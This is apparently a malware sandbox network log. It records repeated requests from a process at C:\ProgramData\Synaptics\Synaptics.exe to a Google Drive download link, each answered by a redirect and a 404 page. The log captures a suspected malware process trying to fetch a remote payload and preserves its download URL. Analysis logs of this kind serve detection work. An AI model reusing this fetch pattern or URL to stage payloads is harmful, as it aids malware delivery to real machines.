                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 75 79 4d 64 6d 72 79 34 52 6f 43 4e 4e 62 61 78 47 36 66 43 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="euyMdmry4RoCNNbaxG6fCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.449781142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-VJPdB0cZXQ865dJtRr7AlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.449782142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:08 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6OI7jOjG9pqD-JB6VBKw-lNmfn-FpVLZ4D4i0AQUfHdPzms9Bmme_aISUQKU6yFXJcsnOjBRw
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-cLeGq_b3dmlbSq3kkno-mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 5a 68 34 6b 6e 67 73 6f 54 30 72 6e 71 41 4a 32 51 42 30 37 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="uZh4kngsoT0rnqAJ2QB07Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.449784142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:08 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:09 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-65OwhZNPhIjWiYJXCMt0Zw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.449785142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:09 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-rig9S4p60Oo7aYG9PAxs1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.449786142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:09 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:09 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7iwG5COxEj42xDB47WZi81Ns6vtoBxcgv3rrqX5cCYgTneMPmBKWEts5q9pq6LqvFO
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:09 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ambaCKeutSA7W5Eg3OiHWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:09 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:09 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 67 4e 45 43 65 4e 35 6f 62 45 2d 49 62 6e 6a 66 33 71 7a 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="BgNECeN5obE-Ibnjf3qzTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:09 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.449787142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:09 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:09 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC4l2CE9CZWmi10w3eXhiq3JmEpXk9Dh_RUlT7NT__k0_5KwHDmAThWoM-MVrt-KpUZ6lNr3y2I
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:09 GMT
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-w8JANNrhNJlabzhpiYjmvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:09 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:09 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 51 34 74 34 4e 70 31 61 68 46 4c 78 32 6a 59 74 5f 66 37 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="QQ4t4Np1ahFLx2jYt_f7Ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:09 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.449795142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:10 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-8bD2-ZAdgQATBn-16FPjVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
